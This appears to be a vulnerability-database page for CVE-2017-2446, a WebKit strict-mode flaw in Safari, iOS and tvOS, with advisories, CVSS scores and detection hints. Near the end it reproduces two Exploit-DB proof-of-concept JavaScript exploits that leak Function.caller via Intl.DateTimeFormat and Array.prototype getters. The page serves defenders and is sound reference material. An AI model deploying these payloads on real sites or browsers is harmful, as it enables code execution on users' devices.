CVE-2017-2446
published 2017-04-02CVE-2017-2446: An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue…
PriorityP265high8.8CVSS 3.0
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
8.19%
94.2th percentile
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | ios | — | — |
| apple | iphone_os | <= 10.2.1 | — |
| apple | safari | <= 10.0.3 | — |
| apple | safari | — | — |
| apple | tvos | <= 10.1.1 | — |
| apple | tvos | — | — |
| debian | webkit2gtk | < webkit2gtk 2.14.6-1 (bookworm) | webkit2gtk 2.14.6-1 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit abuses Intl.DateTimeFormat.format() with a crafted object whose valueOf property is a function that leaks f.caller — look for JavaScript using 'new Intl.DateTimeFormat()' combined with a custom valueOf function passed to .format() ↗
- →Exploit variant abuses Array.prototype property getter to leak g.caller in strict mode — look for Object.defineProperty on Array.prototype numeric indices combined with .concat() calls ↗
- →Both PoC exploits call the leaked caller reference with a numeric magic value (0x77777777 or 0x7777) as the first argument — this pattern in JS heap/memory may indicate exploitation attempts ↗
- →The vulnerability is triggered by processing maliciously crafted web content in WebKit — monitor for Safari/WebKit processes spawning unexpected child processes as a post-exploitation indicator ↗
- →Root cause is a logic issue in the handling of strict mode functions (Function.caller access bypass) — detection should focus on JavaScript that accesses .caller or .arguments on strict-mode functions via builtins or prototype getters ↗
- ·Affected platforms are iOS before 10.3, Safari before 10.1, and tvOS before 10.2 — exploitation is only possible on unpatched versions of these Apple products ↗
- ·On Debian-based Linux systems (webkit2gtk), the vulnerability is resolved in version 2.14.6-1 across all tracked branches — ensure this version or later is deployed ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv8.8HIGH
vendor_debian8.8LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
WebKitGTK+ vulnerabilities
vendor_ubuntu·2017-04-10
CVE-2016-9642 WebKitGTK+ vulnerabilities
Title: WebKitGTK+ vulnerabilities
Summary: Several security issues were fixed in WebKitGTK+.
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Instructions: This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
Apple
CVE-2017-2446: tvOS 10.2
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: tvOS 10.2
Apple Security Update: About the security content of tvOS 10.2
Product: tvOS
Version: 10.2
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Apple
CVE-2017-2446: iOS 10.3
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: iOS 10.3
Apple Security Update: About the security content of iOS 10.3
Product: iOS
Version: 10.3
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Apple
CVE-2017-2446: Safari 10.1
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: Safari 10.1
Apple Security Update: About the security content of Safari 10.1
Product: Safari
Version: 10.1
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Debian
CVE-2017-2446: webkit2gtk - An issue was discovered in certain Apple products. iOS before 10.3 is affected. ...
vendor_debian·2017·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: webkit2gtk - An issue was discovered in certain Apple products. iOS before 10.3 is affected. ...
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
Scope: local
bookworm: resolved (fixed in 2.14.6-1)
bullseye: resolved (fixed in 2.14.6-1)
forky: resolved (fixed in 2.14.6-1)
sid: resolved (fixed in 2.14.6-1)
trixie: resolved (fixed in 2.14.6-1)
GHSA
GHSA-3f9w-9gh8-8jm4: An issue was discovered in certain Apple products
ghsa_unreviewed·2022-05-13
CVE-2017-2446 [HIGH] GHSA-3f9w-9gh8-8jm4: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
OSV
CVE-2017-2446: An issue was discovered in certain Apple products
osv·2017-04-02·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
No detection rules found.
Exploit-DB
Apple Safari - 'DateTimeFormat.format' Type Confusion
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - 'DateTimeFormat.format' Type Confusion
---
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
var i = new Intl.DateTimeFormat();
//print(i);
var q;
function f(){
//print("in f");
//print(f.caller);
q = f.caller;
return 10;
}
try{
i.format({valueOf : f});
}catch(e){
//print("problem");
}
//print(q);
q.call(0x77777777);
Exploit-DB
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
---
var q;
function g(){
//print("in g");
//print(arguments.caller);
//print(g.caller);
q = g.caller;
//print(g.caller);
return 7;
}
var a = [1, 2, 3];
Object.defineProperty( Array.prototype, "1", { get : g} );
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
alert(q);
q(0x7777, 0x7777, 0);
No writeups or analysis indexed.
http://www.securityfocus.com/bid/97130http://www.securitytracker.com/id/1038137https://bugs.chromium.org/p/project-zero/issues/detail?id=1032https://doar-e.github.io/blog/2018/07/14/cve-2017-2446-or-jscjsglobalobjectishavingabadtime/https://security.gentoo.org/glsa/201706-15https://support.apple.com/HT207600https://support.apple.com/HT207601https://support.apple.com/HT207617https://www.exploit-db.com/exploits/41741/https://www.exploit-db.com/exploits/41742/http://www.securityfocus.com/bid/97130http://www.securitytracker.com/id/1038137https://bugs.chromium.org/p/project-zero/issues/detail?id=1032https://doar-e.github.io/blog/2018/07/14/cve-2017-2446-or-jscjsglobalobjectishavingabadtime/https://security.gentoo.org/glsa/201706-15https://support.apple.com/HT207600https://support.apple.com/HT207601https://support.apple.com/HT207617https://www.exploit-db.com/exploits/41741/https://www.exploit-db.com/exploits/41742/
2017-04-02
Published